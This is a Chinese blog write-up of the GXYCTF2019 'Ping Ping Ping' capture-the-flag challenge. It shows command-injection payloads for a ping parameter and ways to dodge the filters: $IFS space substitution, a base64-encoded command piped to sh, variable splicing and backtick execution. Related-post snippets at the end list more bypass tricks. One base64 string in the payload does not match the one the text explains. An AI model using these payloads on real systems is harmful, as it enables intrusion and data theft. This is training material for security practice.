[GXYCTF2019]Ping Ping Ping

最新推荐文章于 2024-01-08 19:02:32 发布
最新推荐文章于 2024-01-08 19:02:32 发布
阅读量212 收藏
点赞数
分类专栏: ctf wp 文章标签: php 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45859850/article/details/109148722
版权

通过大佬的博客学习知道怎么绕过
命令执行漏洞利用及绕过方式总结
在这里插入图片描述
在这里插入图片描述
首先使用burp抓包看看过滤了什么字符
基本上大部分字符都被过滤了,就很烦人
尝试构造?ip=127.0.0.1;ls
发现有两个东西
在这里插入图片描述

?ip=127.0.0.1;ls flag.php

发现被过滤
在这里插入图片描述
空格和flag都被过滤了

用刚才学到的${IFS}绕过

可能{}也被过滤了

用$IFS$1绕过

在网上看到源码
在这里插入图片描述
发现bash也被过滤
还好sh可以利用

?ip=127.0.0.1;echo$IFS$1Y2phpF0IGZsYWcucGhw|base64$IFS$1-d|sh

Y2F0IGZsYWcucGhw是cat flag.php的base64-encode

成功拿到flag
在这里插入图片描述
或者用变量拼接↓

我们看到源码中有一个$a变量可以覆盖

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

通过学习大佬发现还有一种方法:
内联执行绕过

payload: cat$IFS$1`ls`

使用内联执行会将 ``内的输出作为前面命令的输入,当我们输入上述payload时,等同于cat flag.php;cat index.php

#_##
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[GXYCTF2019]Ping Ping Ping - RCE(空格、关键字绕过[3种方式])
oZuoShen123的博客
10-11 700
/?ip= |\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo preg_match("/\&|\/|\?|\*|\|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match); die("fxck your symbol!"); } else if(preg_match("/ /", $ip)){ die("fxck your space!"); } else
[GXYCTF2019]Ping Ping Ping {命令执行总结}
qq_42812036的博客
02-13 5985
0x00 知识点 命令注入 绕过空格、敏感字符、连接符 0x01 解题 方法一 内联执行 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ps: 参数顺序要注意,adc换位acdflag会被检测出来:) 过滤了?/\{}()[]* 否则bash语法可以用“?”,正斜杠“/”,数字和字母来执行系统命令。 过滤空格 1.使用<或者<&gt...
BUUCTF——web([GXYCTF2019]Ping Ping Ping、[极客大挑战 2019]Knife、[极客大挑战 2019]Http)
LizePing_的博客
07-16 325
BUUCTF-web[GXYCTF2019]Ping Ping Ping做题思路 [GXYCTF2019]Ping Ping Ping 做题思路 打开看题目 熟悉的样子,ping本地加查看命令,得到两个php文件 接着查看一下文件内容 奇奇怪怪的是,我发现空格被过滤了。 好家伙,百度找了找,直呼好家伙, 构造payload, ...
CTF——ping相关
jklw4的博客
09-12 4397
Ping PING (Packet Internet Groper),因特网包探索器,用于测试网络连接量的程序 [1] 。 Ping是工作在 TCP/IP网络体系结构中应用层的一个服务命令, 主要是向特定的目的主机发送 ICMP(Internet Control Message Protocol 因特网报文控制协议)Echo 请求报文,测试目的站是否可达及了解其有关状态 [2] 。 检测是否可以注入 127.0.0.1;whoami 如果存在注入,得到的结果是“www-data” ping 题目
[GXYCTF2019]Ping Ping Ping 1
weixin_45674567的博客
07-08 1358
直接尝试:/?ip=127.0.0.1;ls; 看到flag.php,尝试读取:他提示不能有空格,绕过试一试: 尝试,回显/?ip= 1fxck your symbol!表示出现了非法字符,发现能代替空格的/**/、%0a、IFS等都被过滤了,但{IFS}等都被过滤了,但IFS等都被过滤了,但IFS9还可以使用,于是/?ip=127.0.0.1;cat9还可以使用,于是 /?ip=127.0.0.1;cat9还可以使用,于是/?ip=127.0.0.1;catIFS$9flag.php; 又说不能出现..
GXYCTF2019 Ping Ping Ping 1
qq_52715164的博客
04-17 1417
解题步骤: 1,尝试用输入一个正确的IP地址 2,发现是linux系统下的网站,尝试用|和ls查看目录,列出文件 3,尝试查看flag文件,发现不能直接打开,且空格被过滤,原因:关键字被过滤 4,找到被过滤字符名单,尝试打开index.php文件,发现过滤字符列表 5,尝试绕过 代码中有个 $a 考虑进行变量覆盖,构造如下 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ?ip=127.0.0.1;a=g,cat$IFS$1fla$a.php 或者另外一种方
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5141
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
BUUCTF[GXYCTF2019]Ping Ping Ping
楼阁de猫的博客
12-19 244
[GXYCTF2019]Ping Ping Ping 直接ping 127.0.0.1 有回显,ls一下 发现flag.php,cat一下 事情果然没有这么简单,这里空格被过滤了,下面有几种绕过空格的方法 $IFS ${IFS} $IFS$9 //$9改成 $ 加其他数字貌似都行 < <> {cat,flag.php} //用逗号实现了空格功能 %20 (space) %09(Tab) 这里用 $IFS$9绕过空格之后,发现flag又被ban了,那就cat一下index.p
CTF入门笔记之ping
qq_37410729的博客
11-02 4267
1.用命令行找flag文件 随便ping,然后跟ls 例如:1;ls 发现index.php文件 1;cat index.php 查看发现就是源网站。 那就向上找 1;ls …/ 继续向上找 直到1;ls …/…/…/ 发现flag 打开 1;cat …/…/…/flag 得到flag 2.绕过过滤打开文件 同样,先查看目录 payload:?ip=1;ls 发现两个文件,尝试直接打开index文件(虽然知道肯定不行) payload:?ip=1;cat index.php 果然不行
ctf-ping命令执行
qq_45414878的博客
11-08 9791
[GXYCTF2019]Ping Ping Ping 现在做一下关于常见的绕过ping执行其他命令的姿势,启动环境,连接并输入参数,查看当前目录下都有什么 ls命令没有被过滤,并且知道flag就在这个目录下面,用cat查看的flag的时候发现空格被禁用,绕过空格常用的方法有 {cat,flag.php} cat${IFS}flag.php cat$IFS$9flag.php cat<flag.php cat<>flag.php kg=$'\x20flag.php'&&c
CTF关于ping命令注入问题(1)
热门推荐
欢迎来到神林的博客
03-07 1万+
题目样式 对于看到ping或者ping命令却没有弄waf时就要想到命令注入。 具体注入方法 看到ping命令就可以利用截断来执行新的命令。 首先测试所有的截断符号: ‘$’ ‘;’ ‘|’ ‘-’ ‘(’ ‘)’ ‘反引号’ ‘||’ ‘&amp;&amp;’ ‘&amp;’ ‘}’ ‘{’ '%0a’可以当作空格来用; 利用截断符号配合普通命令简单问题基本就出来; 例如:ip=127.0.0.1...
云演CTF web题型 ping
cadandme的博客
01-19 1986
ping 打开页面提示用GET方式提交ip 尝试管道符分隔命令查看目录,没回显,被禁用 在这里我尝试了好久,忘记有哪些命令分隔符可以代替了,查找后才知道 Linux下一般的命令分隔符有这几个 | || & && . ; - <> $ %0a %0d ` 逐个尝试,%0a可以使用 到这一步,我们就可以看出flag就在fL4g_1s_He4r_______中了,直接查看,得到flag ...
CTF 解题 云演 ping
最新发布
weixin_53488451的博客
01-08 474
输入http://88f9c597.clsadp.com/?ip=127.0.0.1%0acat%20fL4g_1s_He4r_______4.查看其文件得出flag。3.尝试查看,发现文件名。2.检查主机是否在线。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值